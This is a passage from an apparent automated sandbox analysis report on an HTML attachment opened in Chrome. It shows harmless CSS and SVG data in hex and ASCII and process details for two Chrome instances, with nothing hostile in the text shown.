                                                                                                                                                                                                                                      2025-01-07 17:54:12 UTC128INData Raw: 20 76 69 65 77 42 6f 78 3d 5c 5c 5c 22 30 20 30 20 32 30 20 32 30 5c 5c 5c 22 20 66 69 6c 6c 3d 5c 5c 5c 22 25 32 33 30 30 30 30 30 30 5c 5c 5c 22 5c 75 30 30 33 45 5c 75 30 30 33 43 70 61 74 68 20 64 3d 5c 5c 5c 22 4d 31 37 20 31 32 76 35 48 33 76 2d 35 48 31 76 35 61 32 20 32 20 30 20 30 30 32 20 32 68 31 34 61 32 20 32 20 30 20 30 30 32 2d 32 76 2d 35 7a 5c 5c 5c 22 2f 5c 75 30
                                                                                                                                                                                                                                      Data Ascii: viewBox=\\\"0 0 20 20\\\" fill=\\\"%23000000\\\"\u003E\u003Cpath d=\\\"M17 12v5H3v-5H1v5a2 2 0 002 2h14a2 2 0 002-2v-5z\\\"/\u0
                                                                                                                                                                                                                                      2025-01-07 17:54:12 UTC16320INData Raw: 30 33 45 5c 75 30 30 33 43 70 61 74 68 20 64 3d 5c 5c 5c 22 4d 31 35 20 39 68 2d 34 56 31 48 39 76 38 48 35 6c 35 20 36 7a 5c 5c 5c 22 2f 5c 75 30 30 33 45 5c 75 30 30 33 43 2f 73 76 67 5c 75 30 30 33 45 5c 22 29 3b 66 69 6c 74 65 72 3a 69 6e 76 65 72 74 28 76 61 72 28 2d 2d 66 69 6c 74 65 72 2d 69 6e 76 65 72 74 2d 69 63 6f 6e 2c 30 29 29 3b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 6f 70 61 63 69 74 79 2d 69 63 6f 6e 2d 62 61 73 65 2c 30 2e 38 37 29 7d 2e 63 64 78 2d 62 75 74 74 6f 6e 3a 6e 6f 74 28 2e 63 64 78 2d 62 75 74 74 6f 6e 2d 2d 77 65 69 67 68 74 2d 71 75 69 65 74 29 3a 64 69 73 61 62 6c 65 64 20 2e 6d 77 2d 6d 6d 76 2d 64 6f 77 6e 6c 6f 61 64 2d 62 75 74 74 6f 6e 20 2e 6d 77 2d 6d 6d 76 2d 69 63 6f 6e 2c 2e 63 64 78 2d 62 75 74 74 6f 6e 2d 2d
                                                                                                                                                                                                                                      Data Ascii: 03E\u003Cpath d=\\\"M15 9h-4V1H9v8H5l5 6z\\\"/\u003E\u003C/svg\u003E\");filter:invert(var(--filter-invert-icon,0));opacity:var(--opacity-icon-base,0.87)}.cdx-button:not(.cdx-button--weight-quiet):disabled .mw-mmv-download-button .mw-mmv-icon,.cdx-button--


                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:12:52:20
                                                                                                                                                                                                                                      Start date:07/01/2025
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\ATT562720.htm
                                                                                                                                                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                      Start time:12:52:20
                                                                                                                                                                                                                                      Start date:07/01/2025
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1976,i,13158292659480297210,1621453939140993406,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      No disassembly